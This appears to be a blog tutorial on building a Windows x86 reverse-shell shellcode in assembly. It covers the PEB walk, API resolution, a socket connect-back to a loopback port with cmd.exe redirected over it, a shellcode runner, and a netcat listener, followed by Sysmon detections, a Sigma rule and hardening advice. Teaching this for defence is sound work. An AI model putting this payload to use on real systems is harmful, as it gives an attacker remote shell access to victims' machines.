Writing Your First Shellcode: x86 Reverse Shell from Scratch
Objective: Understand how a Windows x86 reverse shell payload is hand-built in NASM assembly (walking the PEB to locate kernel32.dll, parsing the PE export table to resolve GetProcAddress without imports, initialising Winsock, and spawning cmd.exe over a socket) and learn the telemetry each stage emits so you can detect and defend against it.
1. What Is Shellcode? Constraints and Goals
Shellcode is a self-contained blob of machine code that runs after a control-flow hijack (or injection) with no loader, no imports, and no fixed base address. It is the raw payload that tools like msfvenom emit; understanding it byte-by-byte is what lets a defender recognise it in memory.
A Windows x86 reverse shell differs from a Linux equivalent in one fundamental way: Linux exposes a stable syscall/int 0x80 interface, while Windows forces you to call documented Win32 APIs — and you cannot import them, because injected code has no import table. You must therefore find the APIs yourself at runtime.
| Constraint | Description |
|---|---|
| Position independent | Runs at an unknown address; all references are stack-relative or computed |
| Null-free | \x00 terminates strings in many injection vectors and truncates the payload |
| No imports | API addresses must be resolved from loaded modules at runtime |
| Bad-char aware | \x00, \x0a, \x0d and vector-specific bytes must be avoided by design |
Lab setup: a Windows 10 x86 VM, NASM for assembly, WinDbg for stepping the PEB walk, a small C runner to execute the blob, and a Python scanner to audit bad characters. Build and test only in an isolated VM.
2. x86 Calling Conventions and Stack Mechanics
Win32 APIs use stdcall: arguments are pushed right-to-left, and the callee cleans the stack with ret N. This matters because after an API call returns, whether it succeeded or failed, you do not adjust esp yourself; the function already did. cdecl (caller cleans) appears only in CRT helpers you will not touch here.
| Convention | Stack Cleanup | Argument Order | Used By |
|---|---|---|---|
| stdcall | Callee (ret N) | Right-to-left | Win32 APIs (CreateProcessA, WSASocketA) |
| cdecl | Caller | Right-to-left | CRT functions |
eax, ecx, and edx are volatile (caller-saved); ebx, esi, edi, and ebp survive a call. Shellcode exploits this: stash the kernel32 base in ebx and a resolver pointer in ebp, and they persist across every API call. Strings and structures are constructed by pushing dwords onto the stack in reverse, then referencing them directly through esp.
3. The PEB Walk: Finding kernel32.dll Without Imports
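Every thread can reach its Process Environment Block (PEB) through its TEB: in a 32-bit process the FS segment points at the TEB, and the PEB pointer sits at FS:[0x30]. The PEB holds Ldr (a PEB_LDR_DATA) at +0x0C, whose InMemoryOrderModuleList at +0x14 is a doubly-linked list of loaded modules. In 32-bit processes on Windows 7 through 11 the list order is stable in practice: [0] the executable → [1] ntdll.dll → [2] kernel32.dll. Two FLink dereferences from the first entry land on kernel32's entry. Because each pointer addresses the InMemoryOrderLinks field (offset 0x08 in the entry) rather than the start of the entry, DllBase (offset 0x18) sits 0x10 bytes past it.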
bits 32
xor eax, eax
mov eax, [fs:0x30] ; TEB->ProcessEnvironmentBlock (PEB)
mov eax, [eax+0x0c] ; PEB->Ldr (PEB_LDR_DATA)
mov eax, [eax+0x14] ; Ldr->InMemoryOrderModuleList (1st: executable)
mov eax, [eax] ; FLink -> ntdll.dll entry
mov eax, [eax] ; FLink -> kernel32.dll entry
mov ebx, [eax+0x10] ; LDR entry->DllBase (kernel32 base) -> ebx
Verify the chain live in WinDbg before trusting any offset on your target build:
0:000> dt nt!_TEB @$teb ProcessEnvironmentBlock
0:000> dt nt!_PEB @$peb Ldr
0:000> dt nt!_PEB_LDR_DATA poi(@$peb+0xc) InMemoryOrderModuleList
0:000> dl poi(poi(@$peb+0xc)+0x14) 4
![Flowchart showing the PEB walk chain from TEB at FS:[0x30] through PEB, PEB_LDR_DATA, and InMemoryOrderModuleList to reach kernel32.dll base address](https://genxcyber.com/wp-content/uploads/2026/06/x86-reverse-shell-shellcode-from-scratch-bf1-scaled.png)
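To make the pointer arithmetic concrete, the following Python sketch replays the same dereferences against a small simulated address space. Every address and module base in it is invented for illustration; only the structure offsets (PEB+0x0C, Ldr+0x14, InMemoryOrderLinks at 0x08, DllBase at 0x18) are taken from the 32-bit layouts discussed in this section.

```python
# Simulated 32-bit memory: address -> dword. All addresses are made up.
PEB, LDR = 0x1000, 0x2000
ENTRIES = {              # fake LDR_DATA_TABLE_ENTRY address -> fake DllBase
    0x3000: 0x00400000,  # [0] the executable
    0x4000: 0x77000000,  # [1] ntdll.dll
    0x5000: 0x76000000,  # [2] kernel32.dll
}
OFF_LDR = 0x0C                   # PEB->Ldr
OFF_IN_MEMORY_ORDER_LIST = 0x14  # PEB_LDR_DATA->InMemoryOrderModuleList
OFF_LINKS = 0x08                 # LDR entry->InMemoryOrderLinks
OFF_DLL_BASE = 0x18              # LDR entry->DllBase


def build_memory():
    """Lay out a list head plus three entries chained through their Flink fields."""
    mem = {PEB + OFF_LDR: LDR}
    head = LDR + OFF_IN_MEMORY_ORDER_LIST
    links = [addr + OFF_LINKS for addr in ENTRIES]
    # head -> entry0 -> entry1 -> entry2 -> head
    for src, dst in zip([head] + links, links + [head]):
        mem[src] = dst
    for addr, base in ENTRIES.items():
        mem[addr + OFF_DLL_BASE] = base
    return mem


def walk_to_third_module(mem):
    """Mirror the assembly: Ldr, list head, two Flink hops, then DllBase."""
    p = mem[PEB + OFF_LDR]                      # PEB->Ldr
    p = mem[p + OFF_IN_MEMORY_ORDER_LIST]       # first entry's InMemoryOrderLinks
    p = mem[p]                                  # Flink -> second entry
    p = mem[p]                                  # Flink -> third entry
    return mem[p + (OFF_DLL_BASE - OFF_LINKS)]  # 0x18 - 0x08 = 0x10


print(hex(walk_to_third_module(build_memory())))
```

The subtraction in the last line is the reason the assembly reads at +0x10 rather than +0x18: the pointer being followed already sits 8 bytes into the entry.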
4. Export Table Parsing: Resolving GetProcAddress
The bootstrap problem: shellcode cannot call GetProcAddress until it has found GetProcAddress. The fix is to parse the kernel32 PE export table manually. From the base, e_lfanew at +0x3C reaches the NT headers; the export-directory RVA lives at NT +0x78; the directory exposes three parallel arrays — AddressOfNames (+0x20), AddressOfNameOrdinals (+0x24), and AddressOfFunctions (+0x1C).
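The same lookup can be sketched in Python, which is also roughly how an analyst would confirm the offsets offline. This is a minimal illustration under stated assumptions: the image is a PE32 laid out as mapped in memory (so an RVA can be used directly as an offset), and the tiny image built by the hypothetical `build_fake_image` helper is synthetic, not a real DLL.

```python
import struct


def u32(img, off):
    return struct.unpack_from("<I", img, off)[0]


def u16(img, off):
    return struct.unpack_from("<H", img, off)[0]


def cstring(img, off):
    return img[off:img.index(b"\x00", off)].decode("ascii")


def resolve_export(img, wanted):
    """Return the RVA of export `wanted`, or None if it is not exported by name."""
    nt = u32(img, 0x3C)               # e_lfanew
    exp = u32(img, nt + 0x78)         # export directory RVA (PE32)
    count = u32(img, exp + 0x18)      # NumberOfNames
    functions = u32(img, exp + 0x1C)  # AddressOfFunctions
    names = u32(img, exp + 0x20)      # AddressOfNames
    ordinals = u32(img, exp + 0x24)   # AddressOfNameOrdinals
    for i in range(count):
        if cstring(img, u32(img, names + 4 * i)) == wanted:
            index = u16(img, ordinals + 2 * i)  # name index -> function index
            return u32(img, functions + 4 * index)
    return None


def build_fake_image():
    """Synthetic two-export image; every value here is invented for the demo."""
    img = bytearray(0x400)
    struct.pack_into("<I", img, 0x3C, 0x80)            # e_lfanew
    struct.pack_into("<I", img, 0x80 + 0x78, 0x200)    # export directory RVA
    struct.pack_into("<I", img, 0x200 + 0x18, 2)       # NumberOfNames
    struct.pack_into("<I", img, 0x200 + 0x1C, 0x240)   # AddressOfFunctions
    struct.pack_into("<I", img, 0x200 + 0x20, 0x250)   # AddressOfNames
    struct.pack_into("<I", img, 0x200 + 0x24, 0x260)   # AddressOfNameOrdinals
    struct.pack_into("<II", img, 0x240, 0x1111, 0x2222)  # function RVAs
    struct.pack_into("<II", img, 0x250, 0x300, 0x320)    # name RVAs
    struct.pack_into("<HH", img, 0x260, 1, 0)            # name i -> function index
    img[0x300:0x304] = b"Beep"
    img[0x320:0x32E] = b"GetProcAddress"
    return bytes(img)


print(hex(resolve_export(build_fake_image(), "GetProcAddress")))
```

Note the indirection through the ordinal array: the position of a name in AddressOfNames is not the index into AddressOfFunctions, which is why the fake image deliberately maps the second name to the first function.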
; ebx = kernel32 base
mov eax, [ebx+0x3c] ; e_lfanew
mov eax, [ebx+eax+0x78] ; export table RVA
lea edi, [ebx+eax] ; edi -> IMAGE_EXPORT_DIRECTORY
mov ecx, [edi+0x20] ; AddressOfNames RVA
lea ecx, [ebx+ecx] ; -> name-pointer array
xor edx, edx ; name index = 0
.next:
mov esi, [ecx+edx*4] ; RVA of candidate name
lea esi, [ebx+esi] ; -> ASCII name string
; compare esi against "GetProcAddress" (string or 4-byte hash) ...
inc edx
jmp .next
.match:
mov eax, [edi+0x24] ; AddressOfNameOrdinals RVA
movzx eax, word [ebx+eax+edx*2] ; ordinal index for this name
mov ecx, [edi+0x1c] ; AddressOfFunctions RVA
mov eax, [ebx+ecx+eax*4]; function RVA
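lea eax, [ebx+eax] ; eax = VA of GetProcAddress
Production shellcode usually replaces the byte-by-byte string comparison with a rolling 32-bit hash of each export name: the code is smaller and no API name strings have to be embedded, although a hash constant that happens to contain a bad byte still has to be avoided.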
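The text does not say which hash is meant, so the sketch below assumes one widely documented variant: rotate the running 32-bit value right by 13 bits, then add the next character. Defenders can use the same function to precompute hashes of interesting export names and search memory dumps for those constants.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by `count` bits."""
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name):
    """Rolling hash over an ASCII export name (terminator not included)."""
    h = 0
    for ch in name.encode("ascii"):
        h = (ror32(h, 13) + ch) & 0xFFFFFFFF
    return h


for api in ("LoadLibraryA", "GetProcAddress", "CreateProcessA"):
    print(f"{api:16s} 0x{ror13_hash(api):08x}")
```

Other variants exist (different rotation counts, case folding, or mixing in the module name), so a hash found in a sample should be checked against several schemes before concluding which API it refers to.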

5. Bootstrapping Further API Resolution
Once GetProcAddress is resolved, save it (e.g. in ebp) and use it to resolve everything else. The first follow-up is LoadLibraryA, which lets you bring in ws2_32.dll and resolve the Winsock functions the reverse shell needs.
; ebp = resolved GetProcAddress, ebx = kernel32 base
push 0x41797261 ; "aryA"
push 0x7262694c ; "Libr"
push 0x64616f4c ; "Load"
mov esi, esp ; esi -> "LoadLibraryA"
push esi
push ebx ; hModule = kernel32
call ebp ; GetProcAddress -> LoadLibraryA in eax
; eax now holds LoadLibraryA; call it on "ws2_32.dll", then resolve
; WSAStartup, WSASocketA, WSAConnect, CreateProcessA, ExitProcess.
Every API name is pushed last dword first, with each dword holding its four characters in little-endian order, so the string reads correctly in memory from esp upward. Wrap the resolve-and-call logic in a small subroutine that takes a module base and a name pointer; the reverse shell calls it once for each API it needs.
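When reading a disassembly, the reverse operation is the useful one: given the immediates in the order they were pushed, recover the string they build. A minimal sketch, where `decode_stack_string` is a hypothetical helper name rather than part of any tool:

```python
import struct


def decode_stack_string(pushed_dwords):
    """Rebuild the ASCII string formed by a run of `push imm32` instructions.

    `pushed_dwords` is in execution order. The last push ends up at the lowest
    address, so the list is reversed before the dwords are laid out in memory.
    """
    raw = b"".join(struct.pack("<I", d) for d in reversed(pushed_dwords))
    return raw.split(b"\x00", 1)[0].decode("ascii")


# Immediates from the LoadLibraryA listing above, in push order.
print(decode_stack_string([0x41797261, 0x7262694C, 0x64616F4C]))

# A zero dword pushed first acts as the terminator for a later string.
print(repr(decode_stack_string([0x00000000, 0x6578652E, 0x646D6320])))
```

Scanning for runs of `push imm32` whose decoded bytes are printable ASCII is a cheap static heuristic for spotting stack strings in an extracted blob.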
6. Winsock Initialisation and Socket Creation
WSAStartup(0x0202, &wsaData) must run before any socket API. Reserve the 400-byte WSADATA on the stack and pass a pointer; the OS fills it. Then WSASocketA(2, 1, 6, NULL, 0, 0) creates a TCP socket (AF_INET, SOCK_STREAM, IPPROTO_TCP).
sub esp, 0x190 ; reserve WSADATA (400 bytes)
push esp ; lpWSAData
push 0x0202 ; wVersionRequired = 2.2
call <WSAStartup>
xor eax, eax
push eax ; dwFlags
push eax ; g
push eax ; lpProtocolInfo = NULL
push 6 ; IPPROTO_TCP
push 1 ; SOCK_STREAM
push 2 ; AF_INET
call <WSASocketA> ; eax = socket handle
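mov edi, eax ; save socket in edi
Build the 16-byte SOCKADDR_IN inline and connect. The IP and port are stored in network byte order (big-endian), so the little-endian push immediates look byte-swapped: 127.0.0.1 becomes 0x0100007f, and port 4444 (0x115c) packed above AF_INET (2) becomes the dword 0x5c110002. The loopback constant contains zero bytes, so treat it as a lab-only value; a null-free build has to re-encode it as described in section 8.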
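The two constants can be re-derived in Python as a sanity check, which is also how an analyst turns immediates found in a sample back into an address and port. The helper names below are hypothetical; the layout is the standard 16-byte IPv4 socket address (family, port, address, 8 bytes of padding).

```python
import socket
import struct

AF_INET = 2  # address family value used by Winsock for IPv4


def sockaddr_in_dwords(ip, port):
    """Return the four little-endian dwords that make up a SOCKADDR_IN."""
    raw = (
        struct.pack("<H", AF_INET)  # sin_family, host (little-endian) order
        + struct.pack(">H", port)   # sin_port, network (big-endian) order
        + socket.inet_aton(ip)      # sin_addr, network order
        + bytes(8)                  # sin_zero padding
    )
    return struct.unpack("<4I", raw)


def decode_dwords(family_port, addr):
    """Inverse direction: recover (ip, port) from two dwords seen in a listing."""
    family, port = struct.unpack("<H", struct.pack("<I", family_port)[:2])[0], \
        struct.unpack(">H", struct.pack("<I", family_port)[2:])[0]
    assert family == AF_INET
    return socket.inet_ntoa(struct.pack("<I", addr)), port


print([hex(d) for d in sockaddr_in_dwords("127.0.0.1", 4444)])
print(decode_dwords(0x5C110002, 0x0100007F))
```

Packing the address dword back to bytes also makes it obvious which constants contain 0x00 and would fail a bad-character audit.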
xor eax, eax
push eax ; sin_zero[4..8]
push eax ; sin_zero[0..4]
push 0x0100007f ; sin_addr = 127.0.0.1
push 0x5c110002 ; sin_port 4444 | sin_family AF_INET
mov esi, esp ; esi -> SOCKADDR_IN
push eax ; lpCallee/QoS chain (NULLs)
push eax
push eax
push eax
push 0x10 ; namelen
push esi ; name -> SOCKADDR_IN
push edi ; socket
call <WSAConnect>
7. Spawning cmd.exe Over the Socket
The final stage is the most error-prone: a fully populated 68-byte STARTUPINFOA with cb = 0x44, dwFlags = STARTF_USESTDHANDLES (0x100), and all three standard handles pointed at the connected socket. CreateProcessA(NULL, " cmd.exe", ...) then launches the shell with stdin/stdout/stderr riding the TCP stream.
xor eax, eax
push edi ; hStdError = socket
push edi ; hStdOutput = socket
push edi ; hStdInput = socket
times 9 push eax ; zero lpReserved2..dwY (9 dwords)
push 0x00000100 ; dwFlags = STARTF_USESTDHANDLES
times 4 push eax ; lpTitle, lpDesktop, lpReserved, wShowWindow pad
push 0x44 ; cb = sizeof(STARTUPINFOA)
mov ebx, esp ; ebx -> STARTUPINFOA
sub esp, 0x10
mov esi, esp ; esi -> PROCESS_INFORMATION
push eax ; "....\0" terminator (runtime-supplied null)
push 0x6578652e ; ".exe"
push 0x646d6320 ; " cmd" (0x20 = space, null-free)
mov edx, esp ; edx -> " cmd.exe"
push esi ; lpProcessInformation
push ebx ; lpStartupInfo
push eax ; lpCurrentDirectory
push eax ; lpEnvironment
push eax ; dwCreationFlags
inc eax
push eax ; bInheritHandles = TRUE
dec eax
push eax ; lpThreadAttributes
push eax ; lpProcessAttributes
push edx ; lpCommandLine = " cmd.exe"
push eax ; lpApplicationName = NULL
call <CreateProcessA>
push eax ; uExitCode
call <ExitProcess>
8. Null-Byte Elimination and Bad-Character Audit
A single \x00 mid-payload can truncate your shellcode. Design it out from the start.
| Bad Byte | Naive Source | Null-Free Replacement |
|---|---|---|
| \x00 | mov ecx, 0 | xor ecx, ecx |
| \x00 in string | push 0x00657865 ("exe\0") | terminator from push eax after xor eax,eax |
| \x00 in mov al,0 | mov al, 0 | xor eax, eax then use al |
| \x0a / \x0d | constant containing CR/LF | re-encode IP/port or split the immediate |
The runtime-supplied terminator trick (xor eax, eax → push eax) keeps the " cmd.exe" string null-free, and the leading space that pads " cmd" to a full dword is tolerated by CreateProcessA's command-line parser. Audit the assembled binary with a scanner:
import sys
BAD = {0x00, 0x0a, 0x0d} # extend per injection vector
with open(sys.argv[1], "rb") as f:
    sc = f.read()
for i, b in enumerate(sc):
    if b in BAD:
        print(f"[!] bad char 0x{b:02x} at offset {i}")
print(f"[*] {len(sc)} bytes scanned")
9. Testing and Verification
Assemble to a flat binary, then execute it in a controlled runner that mirrors how an exploit lands code in memory — VirtualAlloc with PAGE_EXECUTE_READWRITE, copy, and call through a function pointer.
nasm -f bin reverse.asm -o reverse.bin
python3 badchars.py reverse.bin
#include <windows.h>
#include <string.h>
unsigned char sc[] = { /* contents of reverse.bin */ };
int main(void) {
    void *mem = VirtualAlloc(NULL, sizeof(sc),
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE); // RWX: loud, lab-only
    if (mem == NULL) return 1; // allocation failed, nothing to run
    memcpy(mem, sc, sizeof(sc));
    ((void(*)())mem)();
    return 0;
}
Catch the callback with nc -lvnp 4444. Note the RWX allocation: real-world loaders allocate RW, copy, then flip to RX with VirtualProtect precisely because PAGE_EXECUTE_READWRITE is a classic detection signal.
10. Common Attacker Techniques
| Technique | Description |
|---|---|
| PEB walk | Locate kernel32.dll base with no imports via FS:[0x30] |
| Export hashing | Resolve APIs by name hash to stay small and null-free |
| Stack string building | Push reversed dwords to stage " cmd.exe", ws2_32.dll, API names |
| STDIO redirection | Point hStdInput/Output/Error at the socket for an interactive shell |
| Process injection | Deliver the blob via VirtualAllocEx + WriteProcessMemory + CreateRemoteThread |
| RWX → RX staging | Allocate RW, copy, VirtualProtect to RX to evade RWX heuristics |
11. Defensive Strategies and Detection
Each shellcode stage emits telemetry. Map detections to the chain, not to a single indicator.
| Sysmon Event ID | Name | What It Catches |
|---|---|---|
| 1 | Process Create | cmd.exe with an unexpected ParentImage / ParentCommandLine |
| 3 | Network Connection | Outbound TCP from cmd.exe or a non-browser binary (C2 connect-back) |
| 8 | CreateRemoteThread | Cross-process thread where SourceImage ≠ TargetImage |
| 10 | ProcessAccess | GrantedAccess to injected memory; CallTrace containing UNKNOWN |
| 11 | FileCreate | Shellcode or loader dropped to disk |
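Mapping detections to the chain means correlating events rather than alerting on each in isolation. The sketch below pairs an outbound connection (EID 3) with a cmd.exe creation (EID 1) whose parent is the connecting process. It assumes events have already been parsed into dictionaries; the field names follow Sysmon's, but the numeric `time` field and the sample records are simplifications invented for the example.

```python
def correlate_connect_then_shell(events, window_seconds=5.0):
    """Return (connection, process_create) pairs where a process connected out
    and then spawned cmd.exe within `window_seconds`."""
    connects_by_pid = {}
    pairs = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["EventID"] == 3:
            connects_by_pid.setdefault(ev["ProcessId"], []).append(ev)
        elif ev["EventID"] == 1 and ev["Image"].lower().endswith("\\cmd.exe"):
            # Events are time-sorted, so every stored connection is earlier.
            for conn in connects_by_pid.get(ev["ParentProcessId"], []):
                if ev["time"] - conn["time"] <= window_seconds:
                    pairs.append((conn, ev))
    return pairs


sample = [
    {"EventID": 3, "time": 10.0, "ProcessId": 4242,
     "Image": r"C:\lab\runner.exe", "DestinationPort": 4444},
    {"EventID": 1, "time": 10.4, "ProcessId": 5000, "ParentProcessId": 4242,
     "Image": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "time": 60.0, "ProcessId": 5001, "ParentProcessId": 900,
     "Image": r"C:\Windows\System32\cmd.exe"},
]

for conn, proc in correlate_connect_then_shell(sample):
    print(f"{conn['Image']} connected to port {conn['DestinationPort']}, "
          f"then spawned cmd.exe (pid {proc['ProcessId']})")
```

In a real pipeline the window, the parent allow-list, and the timestamp parsing would all need tuning; the point is only that the two events together are a much stronger signal than either alone.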
Windows Security auditing adds Event 4688 (process creation with command line, when ProcessCreationIncludeCmdLine_Enabled = 1), 5156 (WFP outbound TCP allowed — the reverse connect at the network layer), and 4689 (process exit, for shell-lifetime correlation). The kernel Microsoft-Windows-Threat-Intelligence ETW provider emits KERNEL_THREATINT_TASK_ALLOCVM/PROTECTVM on RWX activity but requires a signed ELAM/PPL consumer.
A widely used community-style Sigma rule for shellcode injection keys on ProcessAccess:
title: Shellcode Process Injection via Suspicious ProcessAccess
logsource:
    category: process_access
    product: windows
detection:
    selection:
        GrantedAccess:
            - '0x147a'
            - '0x1f3fff'
        CallTrace|contains: 'UNKNOWN'
    condition: selection
tags:
    - attack.defense_evasion
    - attack.privilege_escalation
    - attack.t1055
level: high
Hardening: enable command-line auditing, deploy a tuned Sysmon baseline (SwiftOnSecurity / Olaf Hartong) for EIDs 1/3/8/10, enforce default-deny egress on workstations (reverse shells need outbound TCP), apply ASR rules such as D4F940AB-401B-4EFC-AADC-AD5F3C50688A (block Office applications from creating child processes) and d3e037e1-3eb8-44c8-a917-57927947596d (block JavaScript or VBScript from launching downloaded executable content), and alert on VirtualAlloc(RWX). AMSI does not see raw shellcode but catches PowerShell/VBScript loaders.
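The selection logic of the Sigma rule in this section can be prototyped against parsed Sysmon EID 10 records before it is deployed to a SIEM. This is a hand-written approximation of that one rule, not a Sigma engine: it assumes events are dictionaries keyed by Sysmon field names, treats the GrantedAccess list as "any of", and matches case-insensitively.

```python
SUSPICIOUS_ACCESS = {"0x147a", "0x1f3fff"}  # values taken from the rule above


def matches_selection(event):
    """True when GrantedAccess is one of the listed masks AND CallTrace
    contains the marker for a frame that maps to no loaded module."""
    access = str(event.get("GrantedAccess", "")).lower()
    trace = str(event.get("CallTrace", "")).lower()
    return access in SUSPICIOUS_ACCESS and "unknown" in trace


# Illustrative records; the CallTrace strings are shortened, made-up examples.
events = [
    {"GrantedAccess": "0x1F3FFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|UNKNOWN(0000000002A40123)"},
    {"GrantedAccess": "0x1F3FFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\KERNELBASE.dll+2c13e"},
    {"GrantedAccess": "0x1000",
     "CallTrace": r"UNKNOWN(0000000002A40123)"},
]

for ev in events:
    print(ev["GrantedAccess"], matches_selection(ev))
```

Running candidate logic over a day of benign telemetry first gives an early read on the false-positive rate, since some legitimate software also produces unbacked call-trace frames.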

12. Tools for Shellcode Analysis
| Tool | Description | Link |
|---|---|---|
| NASM | Assemble x86 to flat binary | nasm.us |
| WinDbg | Step the PEB walk and export parse live | microsoft.com |
| x64dbg | Dynamic analysis of the loader and payload | x64dbg.com |
| Ghidra | Static disassembly of extracted shellcode | ghidra-sre.org |
| Radare2 | Lightweight disassembly and patching | radare.org |
| Sysmon | Generate EID 1/3/8/10 detection telemetry | microsoft.com |
| Volatility | Memory forensics — recover RWX regions and injected code | volatilityfoundation.org |
13. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Command and Scripting Interpreter: Windows Command Shell | T1059.003 | Sysmon EID 1 / 4688 cmd.exe spawn chain |
| Process Injection | T1055 | Sysmon EID 10 GrantedAccess + CallTrace UNKNOWN |
| Process Injection: DLL Injection | T1055.001 | Sysmon EID 7/8 on reflective-DLL delivery |
| Obfuscated Files or Information | T1027 | Null-free/encoded IP/port constants in the blob |
| Non-Application Layer Protocol | T1095 | Sysmon EID 3 / 5156 raw TCP from non-browser process |
| Application Layer Protocol: Web Protocols | T1071.001 | Proxy/TLS inspection (contrast C2 transport) |
| System Information Discovery | T1082 | PEB walk as in-memory module discovery |
| Native API | T1106 | Direct WSASocketA / CreateProcessA calls without framework APIs |
Summary
- A Windows x86 reverse shell is just position-independent code that resolves its own APIs, opens a TCP socket, and redirects cmd.exe over it.
- The PEB walk (FS:[0x30] → Ldr → InMemoryOrderModuleList, third entry) locates kernel32.dll with no imports.
- Parsing the PE export table resolves GetProcAddress, which bootstraps LoadLibraryA and every Winsock function.
- Null-byte and bad-character avoidance is a design constraint, not a post-step: xor for zero, reversed stack strings, runtime-supplied terminators.
- Det
Related Tutorials
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- x86 and x64 Assembly from Scratch
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- x86 and x64 Calling Conventions: cdecl, stdcall, fastcall, and System V